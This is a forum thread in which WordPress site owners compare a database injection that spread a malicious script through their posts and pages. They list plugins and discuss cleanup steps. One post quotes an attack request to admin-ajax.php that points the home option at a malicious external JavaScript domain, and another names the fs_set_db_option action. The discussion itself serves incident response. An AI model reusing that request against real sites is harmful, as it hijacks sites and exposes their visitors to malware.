Hack

Same problem, in 2 different sites that we have.
We revert back to previous day and all OK, but problem started a few hours later.
We do have Advanced Access Manager. We are all day trying to see where it comes from. We use Wordfence Premium but it didnt help.

I think I found a suspect IP :
2a07:5741:0:140::1

Was trying something like (not real URL):
https://[XXXXXX].org/wp-admin/admin-ajax.php?%5Bobfuscated%5D=home&option_value=https%3A%2F%2Fjs.wiilberedmodels.com%2Fsample%3Fd%3D1

Please be ware that the code is injected to the posts and then extend to the to the files…

@salvaramirez You mean to pages?

Yes, to pages.
This morning we found teh code in a couple of posts, then in all the posts a few hours later (around 300), and then to around 50-60 pages. We have quite a big website.
I really recommend you to chnge db password (remember to change wp-config after that).

Password is changed.
Now I cross my fingers and hope for the best ??

The best way to check is to check for older posts… It starts there ??

@salvaramirez check? For what.
I searched the site with Search Regex (mentioned above) and I have deleted the inserted script from all posts. Is that what you mean?

I’ve got the same problem on a couple of websites. All are using advanced custom fields pro, all in one seo pack, advanced access manager, polylang, really simple ssl, contact form 7. So any of them can cause problem.
If you have an exact information which plugin causes it let here know. I’m trying to find it in the server logs but without success.

Ok, I am not alone. Found this thread by searching for wiilberedmodels.

I made a file change scan and I think NO file was changed. I am pretty sure that this is a sql injection.

I had 6 DB′s infected. In the last 4 years I made no plugin changes on this websites. On thursday I installed “WP Live Chat and Advanced Access Manager” and today I am hacked. Maybe it is coincidence but do you all use WP Live Chat or Advanced Access Manager?

My Plugins are:

Adminimize
Advanced Access Manager
Advanced Custom Fields
CommerceGurus Toolkit
Contact Form 7
Duplicate Page
Jquery Validation For Contact Form 7
LayerSlider WP
MailChimp for WordPress
Redux Framework
Widget CSS Classes
WP Live Chat Support
WPBakery Visual Composer
WPFront User Role Editor
Yoast SEO

Please list all your installed plugins. We have to find the biggest common denominator.

• This reply was modified 5 years, 2 months ago by marc77.
• This reply was modified 5 years, 2 months ago by marc77.
• This reply was modified 5 years, 2 months ago by marc77.
• This reply was modified 5 years, 2 months ago by marc77.

So as far as I know, it uses and url injection like /wp-admin/admin-ajax.php?action=fs_set_db_option to change home option.

This particular one seems to be blocked by Wordfence, but some others may not.

It must be not just oneplugin, but several. I can say I dont have live chat and I got hacked.

@marc77 Nope.

I had 20+ websites infected. Are some of you using InfiniteWP ?

@salvaramirez
@karelne

Ok, Thank you.

Maybe you have Advanced Access Manager?

Please list all your active plugins.

• This reply was modified 5 years, 2 months ago by marc77.

Advanced Access Manager, Custom post type app page template, Custom POst type UI, Duplicate post, GDPR Cookie compliance, Ninja Forms, Toolser types, Worldfence, WordPress IMporter, WPS Hide login